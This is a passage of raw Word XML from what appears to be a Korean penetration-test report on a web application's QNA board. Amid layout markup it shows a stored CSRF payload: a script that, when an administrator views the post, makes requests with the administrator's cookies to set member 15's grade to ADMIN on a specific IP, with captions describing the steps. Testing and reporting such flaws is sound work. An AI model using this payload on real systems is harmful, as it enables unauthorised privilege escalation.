style="position:absolute;left:0;text-align:left;margin-left:318.1pt;margin-top:76.85pt;width:9.6pt;height:12.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KXFgwIAAC4FAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdLNRG2iUTRW1KkKq&#10;2ooW9ex47WaF12PGTjbhVt6hEm/AhQPPhco7MPZutqXkhLh4x57/b77ZydG6Nmyl0FdgC57vDThT&#10;VkJZ2duCf7g+ffWGMx+ELYUBqwq+UZ4fTV++mDRurIawAFMqZBTE+nHjCr4IwY2zzMuFqoXfA6cs&#10;KTVgLQJd8TYrUTQUvTbZcDAYZQ1g6RCk8p5eT1oln6b4WisZLrT2KjBTcKotpBPTOY9nNp2I8S0K&#10;t6hkV4b4hypqUVlK2oc6EUGwJVZ/haorieBBhz0JdQZaV1KlHqibfPCsm6uFcCr1QuB418Pk/19Y&#10;eb66RFaVNLtDzqyoaUYP3+4evnz/+ePu19d7Rs+EUeP8mEyv3CV2N09ibHitsY5faoWtE66bHle1&#10;DkzSYz7MD4eEviRVPhoejBLu2aOzQx/eKqhZFAqONLaEplid+UAJyXRrEnMZG08Lp5UxrTa+ZLHI&#10;tqwkhY1RrfV7palFKmSYoiZyqWODbCWIFkJKZcMotkl5jCXr6KYpeO+Y73I0Ie+cOtvophLpesfB&#10;Lsc/M/YeKSvY0DvXlQXcFaD82Gdu7bfdtz3H9udQbmiyCC3lvZOnFYF7Jny4FEgcp3nQ3oYLOrSB&#10;puDQSZwtAD/veo/2RD3SctbQzhTcf1oKVJyZd5ZIeZjv78clS5f9g9dx5vhUM3+qscv6GAj/nP4Q&#10;TiYx2gezFTVCfUPrPYtZSSWspNwFlwG3l+PQ7jL9IKSazZIZLZYT4cxeORmDR1Qjea7XNwJdx7BA&#10;1DyH7X6J8TOitbbR08JsGUBXiYWPuHZ401Im0nQ/kLj1T+/J6vE3N/0NAAD//wMAUEsDBBQABgAI&#10;AAAAIQCqwM+S4QAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9NT8MwDIbvSPyHyEjcWMr6BaXp&#10;hCYmDhwQBSSOWeO1hcbpmmwr/x5zgqP9Pnr9uFzNdhBHnHzvSMH1IgKB1DjTU6vg7XVzdQPCB01G&#10;D45QwTd6WFXnZ6UujDvRCx7r0AouIV9oBV0IYyGlbzq02i/ciMTZzk1WBx6nVppJn7jcDnIZRZm0&#10;uie+0OkR1x02X/XBKnj6NPuk/Xh4jvt8nb/vk8d6s4uVuryY7+9ABJzDHwy/+qwOFTtt3YGMF4OC&#10;LM6WjHKQxjkIJrI0TUBseZPfxiCrUv7/ofoBAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA&#10;4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEA&#10;OP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA&#10;muClxYMCAAAuBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAA&#10;ACEAqsDPkuEAAAALAQAADwAAAAAAAAAAAAAAAADdBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAE&#10;AAQA8wAAAOsFAAAAAA==&#10;" fillcolor="white [3201]" stroked="f" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B80009" w:rsidRPr="00B80009">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="26B1EB6D" wp14:editId="1D99033C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2645848</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1673356</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1484676" cy="110753"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3810"/>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05" t="-5373" r="9560" b="-3"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1507116" cy="112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B02" w:rsidRPr="00E67B02">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21FF36CF" wp14:editId="121DE400">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2627267</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>999944</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1464129" cy="87085"/>
            <wp:effectExtent l="0" t="0" r="3175" b="8255"/>
            <wp:wrapNone/>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94" r="-1468" b="4762"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1469349" cy="8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7B02" w:rsidRPr="00E67B02">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B80009" w:rsidRPr="00B80009">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00124A73">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="319CE0C6" wp14:editId="1FC08741">
            <wp:extent cx="4572000" cy="2975644"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="15240"/>
            <wp:docPr id="1951474666" name="그림 195147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114" r="1904" b="29131"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="2975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FBC119" w14:textId="66B53878" w:rsidR="00124A73" w:rsidRDefault="00124A73" w:rsidP="00124A73">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="410" w:name="_Toc20909462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48</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00246226">
        <w:t xml:space="preserve">. QNA </w:t>
      </w:r>
      <w:r w:rsidR="00246226">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">작성 본문에 </w:t>
      </w:r>
      <w:r w:rsidR="00246226">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00246226">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00246226">
        <w:t xml:space="preserve">est” </w:t>
      </w:r>
      <w:r w:rsidR="00246226">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>계정 권한 상승 스크립트 작성</w:t>
      </w:r>
      <w:bookmarkEnd w:id="410"/>
    </w:p>
    <w:p w14:paraId="476F1A17" w14:textId="0C48CE15" w:rsidR="00124A73" w:rsidRDefault="00124A73" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9187"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45ACA" w14:paraId="4889A943" w14:textId="77777777" w:rsidTr="00447E2D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9187" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5DB5A4E9" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t>&lt;html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C8453FE" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t>&lt;body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B96E67B" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0714C0CC" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t>// 1. 먼저 GET으로 관리자 페이지 요청</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="423509DB" w14:textId="59A1CE7B" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t>fetch("http://</w:t>
            </w:r>
            <w:r w:rsidR="004E602D" w:rsidRPr="004E602D">
              <w:t>43.203.87.232</w:t>
            </w:r>
            <w:r>
              <w:t>/member_admin.do?title=sksrkl3600&amp;grade_change=NORMAL", {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07C7F5CC" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t xml:space="preserve">  method: "GET",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D2D416B" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t xml:space="preserve">  credentials: "include"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C336316" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t>})</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A6D2C32" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t>.then(() =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19452E8B" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t xml:space="preserve">  // 2. 이어서 POST로 권한 업데이트</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E173CB4" w14:textId="2F7B20FF" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t xml:space="preserve">  fetch("http://</w:t>
            </w:r>
            <w:r w:rsidR="004E602D" w:rsidRPr="004E602D">
              <w:t>43.203.87.232</w:t>
            </w:r>
            <w:r>
              <w:t>/adminMemberGradeUpdate.do", {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C806D54" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t xml:space="preserve">    method: "POST",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55EF023C" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t xml:space="preserve">    credentials: "include",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D35A604" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t xml:space="preserve">    headers: {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E2EC8B6" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t xml:space="preserve">      "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03D6BF1E" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t xml:space="preserve">      "X-Requested-With": "XMLHttpRequest"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="606EA2EF" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t xml:space="preserve">    },</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F6D9E24" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t xml:space="preserve">    body: "MEMBER_NO=15&amp;MEMBER_GRADE=ADMIN"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B589375" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t xml:space="preserve">  });</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="101DDB2E" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t>});</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="646E27EF" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70FEECD0" w14:textId="77777777" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t>&lt;/body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="778871FB" w14:textId="7ECFE477" w:rsidR="00B45ACA" w:rsidRDefault="00B45ACA" w:rsidP="00B45ACA">
            <w:r>
              <w:t>&lt;/html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71FBCC37" w14:textId="58D37DBC" w:rsidR="00F92932" w:rsidRDefault="00B45ACA" w:rsidP="00F92932">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="411" w:name="_Toc209094675"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[코드</w:t>
      </w:r>
      <w:r>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5</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>특정 사용자의 권한 상승 코</w:t>
      </w:r>
      <w:r w:rsidR="00F92932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>드</w:t>
      </w:r>
      <w:bookmarkEnd w:id="411"/>
    </w:p>
    <w:p w14:paraId="32096657" w14:textId="77777777" w:rsidR="00F92932" w:rsidRDefault="00F92932" w:rsidP="00F92932">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2857E94A" w14:textId="48683087" w:rsidR="00F92932" w:rsidRDefault="00F92932" w:rsidP="00F92932">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251554816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="601A7E83" wp14:editId="38118562">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1553210</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1714500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="590550" cy="215900"/>
                <wp:effectExtent l="0" t="0" r="19050" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474669" name="직사각형 1951474669"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="590550" cy="2159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AA66" id="직사각형 1951474669" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:122.3pt;margin-top:135pt;width:46.5pt;height:17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gwIAANwEAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDdR0jZRN1XUKgip&#10;aiu1qOeJ185a8h+2k025lXdA4g24cOC5UHkHxt5NGwonRA7OjOfP8803e3K61YpsuA/SmooODkpK&#10;uGG2lmZV0fe3izfHlIQIpgZlDa/oPQ/0dPb61UnrpnxoG6tq7gkmMWHauoo2MbppUQTWcA3hwDpu&#10;0Cis1xBR9aui9tBidq2KYVkeFq31tfOW8RDw9rwz0lnOLwRn8UqIwCNRFcW3xXz6fC7TWcxOYLry&#10;4BrJ+mfAP7xCgzRY9CnVOUQgay//SKUl8zZYEQ+Y1YUVQjKee8BuBuWLbm4acDz3guAE9wRT+H9p&#10;2eXm2hNZ4+wm48HoaHR4OKHEgMZZPX59ePz07cf3h59fPpM9M2LWujDF0Bt37XstoJgA2Aqv0z+2&#10;RrYZ5/snnPk2EoaX40k5HuM0GJqGA9TyHIrnYOdDfMutJkmoqMcxZnRhcxEiFkTXnUuqZexCKpVH&#10;qQxpUy9lzg/IKKEgYintsMdgVpSAWiFVWfQ5ZbBK1ik8JQp+tTxTnmwA6bJYlPhLDMFyv7ml2ucQ&#10;ms4vmzoiaRmRzUrqih6n4F20Mik7z3zsO0gIdpglaWnre5yDtx1Bg2MLiUUuIMRr8MhIRAu3LF7h&#10;IZTFFm0vUdJY//Fv98kfiYJWSlpkOLb/YQ2eU6LeGaTQZDAapZXIymh8NETF71uW+xaz1mcWURng&#10;PjuWxeQf1U4U3uo7XMZ5qoomMAxrd0D3ylnsNg/XmfH5PLvhGjiIF+bGsZQ84ZTgvd3egXf9/CMS&#10;59LutgGmL2jQ+XZEmK+jFTJz5BlXnGBScIXyLPt1Tzu6r2ev54/S7BcAAAD//wMAUEsDBBQABgAI&#10;AAAAIQDnV9M+3wAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUjcqF03aqo0&#10;TgVICIE4lAJ3N3aTqPY6it0k/D3LCW6zu6PZN+Vu9o6NdohdQAXLhQBmsQ6mw0bB58fT3QZYTBqN&#10;dgGtgm8bYVddX5W6MGHCdzseUsMoBGOhFbQp9QXnsW6t13EReot0O4XB60Tj0HAz6InCveNSiDX3&#10;ukP60OrePra2Ph8uXsE+nE/cfUn5mj88y/zFb6ZmfFPq9ma+3wJLdk5/ZvjFJ3SoiOkYLmgicwpk&#10;lq3JSiIXVIocq1VOmyMJkQngVcn/d6h+AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEB&#10;AAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9&#10;If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAP4A&#10;9leDAgAA3AQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAh&#10;AOdX0z7fAAAACwEAAA8AAAAAAAAAAAAAAAAA3QQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAE&#10;APMAAADpBQAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BEC7A61" wp14:editId="1336BFFE">
            <wp:extent cx="4572000" cy="2063245"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="13335"/>
            <wp:docPr id="1951474668" name="그림 195147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08" b="60770"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="206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CD7AB" w14:textId="2C7B9399" w:rsidR="00F73FB0" w:rsidRDefault="00F92932" w:rsidP="00F73FB0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="412" w:name="_Toc20909462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49</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>작성한 게시물 선택</w:t>
      </w:r>
      <w:bookmarkEnd w:id="412"/>
    </w:p>
    <w:p w14:paraId="65207421" w14:textId="77777777" w:rsidR="00F73FB0" w:rsidRDefault="00F73FB0" w:rsidP="00F73FB0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="098FCA5B" w14:textId="003AA6DF" w:rsidR="00002F79" w:rsidRDefault="00F73538" w:rsidP="00F73FB0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00F73538">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251616256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2AD62B17" wp14:editId="36704060">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1722582</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1649152</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="514193" cy="159328"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1951474670" name="그림 195147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4193" cy="1593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627526" wp14:editId="0B627932">
            <wp:extent cx="4572000" cy="2494517"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="20320"/>
            <wp:docPr id="987" name="그림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438" t="38597" r="24740" b="9208"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="24945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A2911" w14:textId="52F85E70" w:rsidR="008E32C2" w:rsidRDefault="00002F79" w:rsidP="008E32C2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="413" w:name="_Toc209094623"/>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50</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>작성</w:t>
      </w:r>
      <w:r w:rsidR="000A7688">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>된 게시물</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="413"/>
    </w:p>
    <w:p w14:paraId="51E2C320" w14:textId="77777777" w:rsidR="008E32C2" w:rsidRDefault="008E32C2" w:rsidP="008E32C2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741C85BC" w14:textId="6B09EB4E" w:rsidR="008E32C2" w:rsidRDefault="005571AA" w:rsidP="008E32C2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251621376" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="769503C6" wp14:editId="5BD0303B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1178560</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1524635</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4012622" cy="170815"/>
                <wp:effectExtent l="0" t="0" r="26035" b="19685"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474686" name="직사각형 1951474686"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4012622" cy="17081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91FDB" id="직사각형 1951474686" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:92.8pt;margin-top:120.05pt;width:315.95pt;height:13.4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AwhgIAAN0EAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdHejJE1X3VRRqyCk&#10;qq2Uop4nXm/Wkv+wnZ9yK++AxBtw4cBzofIOjL2bNhROiBycGc+f55tv9vRspyTZcOeF0RUtjnJK&#10;uGamFnpV0fe38zcTSnwAXYM0mlf0nnt6Nn396nRrSz4wrZE1dwSTaF9ubUXbEGyZZZ61XIE/MpZr&#10;NDbGKQioulVWO9hidiWzQZ6Ps61xtXWGce/x9qIz0mnK3zScheum8TwQWVF8W0inS+cyntn0FMqV&#10;A9sK1j8D/uEVCoTGok+pLiAAWTvxRyolmDPeNOGIGZWZphGMpx6wmyJ/0c2iBctTLwiOt08w+f+X&#10;ll1tbhwRNc7uZFQMj4fjyZgSDQpn9fj14fHTtx/fH35++UwOzIjZ1voSQxf2xvWaRzECsGuciv/Y&#10;GtklnO+fcOa7QBheDvNiMB4MKGFoK47zSTGKg8ieo63z4S03ikShog7nmOCFzaUPneveJRbTZi6k&#10;xHsopSbb2Ew+wnEzQEo1EgKKymKTXq8oAblCrrLgUkpvpKhjeIz2brU8l45sAPkyn+f461/2m1us&#10;fQG+7fySqWOSEgHpLIWq6CQG76Oljtl5ImTfQYSwAy1KS1Pf4yCc6RjqLZsLLHIJPtyAQ0piN7hm&#10;4RqPRhps0fQSJa1xH/92H/2RKWilZIsUx/Y/rMFxSuQ7jRw6KYbDuBNJGY6OB6i4Q8vy0KLX6twg&#10;KgUutGVJjP5B7sXGGXWH2ziLVdEEmmHtDuheOQ/d6uE+Mz6bJTfcAwvhUi8si8kjThHe290dONvP&#10;PyBzrsx+HaB8QYPON0ZqM1sH04jEkWdckVtRwR1KLOv3PS7poZ68nr9K018AAAD//wMAUEsDBBQA&#10;BgAIAAAAIQDDYdXe3wAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwDIbvSLxD5EncWNKI&#10;tVXXdAIkhEAcxoB71nhttSapmqwtb485wfG3P/3+XO4W27MJx9B5pyBZC2Doam861yj4/Hi6zYGF&#10;qJ3RvXeo4BsD7Krrq1IXxs/uHadDbBiVuFBoBW2MQ8F5qFu0Oqz9gI52Jz9aHSmODTejnqnc9lwK&#10;kXKrO0cXWj3gY4v1+XCxCvb+fOL9l5Sv2cOzzF5sPjfTm1I3q+V+CyziEv9g+NUndajI6egvzgTW&#10;U843KaEK5J1IgBGRJ9kG2JEmaSaAVyX//0P1AwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAA&#10;AOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAh&#10;ADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAh&#10;AM6/0DCGAgAA3QQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgA&#10;AAAhAMNh1d7fAAAACwEAAA8AAAAAAAAAAAAAAAAA4AQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAA&#10;BAAEAPMAAADsBQAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
